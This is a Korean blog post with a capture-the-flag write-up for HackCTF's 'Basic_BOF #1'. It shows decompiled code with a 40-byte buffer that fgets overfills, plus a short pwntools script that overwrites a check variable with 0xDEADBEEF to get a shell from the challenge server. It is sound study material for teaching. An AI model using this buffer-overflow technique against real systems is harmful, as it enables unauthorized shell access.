해킹/시스템해킹

[시스템해킹] HackCTF < Basic_BOF #1 >

2021. 9. 9. 18:51
목차
  1. CODE
728x90

사이트 :   https://ctf.j0n9hyun.xyz/challenges#Basic_BOF%20#1


요즘에 블로그를 잘 쓰질 않았는데 다시 한번 작성해 봅니다,,,

 

사용 프로그램 : ida7.5 pro, python 3.8.10, Ubuntu 20.04.3 LTS

CODE

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[40]; // [esp+4h] [ebp-34h] BYREF
  int v5; // [esp+2Ch] [ebp-Ch]

  v5 = 0x4030201;
  fgets(s, 45, stdin);
  printf("\n[buf]: %s\n", s);
  printf("[check] %p\n", v5);
  if ( v5 != 0x4030201 && v5 != 0xDEADBEEF )
    puts("\nYou are on the right way!");
  if ( v5 == 0xDEADBEEF )
  {
    puts("Yeah dude! You win!\nOpening your shell...");
    system("/bin/dash");
    puts("Shell closed! Bye.");
  }
  return 0;
}

위 사이트에서 문제를 다운받고 ida로 디컴파일 해봤을때 나오는 코드입니다.

 

system("/bin/dash"); 를 실행시키는 것이 목적이겠군요.. 

우리가 입력하는 곳은 s이고 이 s의 범위는 40입니다. 하지만 fgets로는 45까지 입력을 받네요. 여기서 BOF가 터집니다.

 

일단 v5가 0xDEABEEF면 되는것 같습니다. dummy[40] + 0xDEADBEEF 면 해결될 문제인것 같습니다.

 

소스코드

더보기

Exploit

from pwn import *

p = remote('ctf.j0n9hyun.xyz', 3000)

v5 = p32(0xDEADBEEF)

payload = b''
payload += b'A'*40 + v5

p.send(payload)
p.interactive()

 

 

[해킹/시스템해킹] - [시스템해킹] Buffer Overflow(BOF)

 

[시스템해킹] Buffer Overflow(BOF)

BUFFER OVERFLOW BOF 설정되어 있는 버퍼의 크기보다 크게 입력을 받을 수 있을 때 생기는 취약점입니다. int __cdecl main(int argc, const char **argv, const char **envp) { char s[40]; // [esp+4h] [ebp-34h..

nabomhalang.tistory.com

 

728x90
저작자표시 비영리 (새창열림)

'해킹 > 시스템해킹' 카테고리의 다른 글

[시스템해킹] HackCTF < Basic_BOF #1 >  (0) 2021.09.09
[시스템해킹] GrabCON Pwn CTF? write up  (0) 2021.09.09
[시스템해킹] GrabCON can you? write up  (0) 2021.09.09
[시스템해킹] GrabCON easy_bin write up  (0) 2021.09.09
[시스템해킹] Buffer Overflow(BOF)  (0) 2021.09.09
  1. CODE
'해킹/시스템해킹' 카테고리의 다른 글
  • [시스템해킹] GrabCON Pwn CTF? write up
  • [시스템해킹] GrabCON can you? write up
  • [시스템해킹] GrabCON easy_bin write up
  • [시스템해킹] Buffer Overflow(BOF)
나봄하랑
나봄하랑
저의 IT 성장을 담은 블로그 입니다!
나봄하랑
나의 IT 성장일지
나봄하랑
전체
오늘
어제
  • 분류 전체보기 (60)
    • 기능반공부 (26)
      • 서버 (6)
      • 네트워크 (6)
      • 클라우드 컴퓨팅 (12)
      • 기능경기대회 (2)
    • 알고리즘 (7)
      • 자료구조 (4)
      • C, C++ (3)
      • python (0)
    • 해킹 (22)
      • 웹해킹 (7)
      • 리버싱 (7)
      • 시스템해킹 (8)
    • 게임이론 (0)
      • 체스 (0)
      • 마작 (0)
    • 웹개발 (1)
      • 웹(HTML, CSS, JS) (1)
    • 공부 (4)
      • 영어 (3)
      • 과학 (0)
      • 국어 (1)
      • 한국사 (0)

블로그 메뉴

  • 홈
  • 태그
  • 방명록
  • about

공지사항

인기 글

태그

  • server
  • 시스템해킹
  • SQL
  • 컴퓨팅
  • Cloud
  • 레지스터
  • SSM
  • BOF
  • AWS
  • 클라우드
  • 모의고사
  • 서버구축
  • computting
  • CC
  • 리버싱
  • Los
  • injection
  • 해킹
  • reversing
  • FSB
  • 아마존
  • CTF
  • 백준
  • 클컴
  • 네트워크
  • computing
  • grabcon
  • 버그
  • 스트링
  • Network

최근 댓글

최근 글

250x250
hELLO · Designed By 정상우.
나봄하랑
[시스템해킹] HackCTF < Basic_BOF #1 >
상단으로

티스토리툴바

개인정보

  • 티스토리 홈
  • 포럼
  • 로그인

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.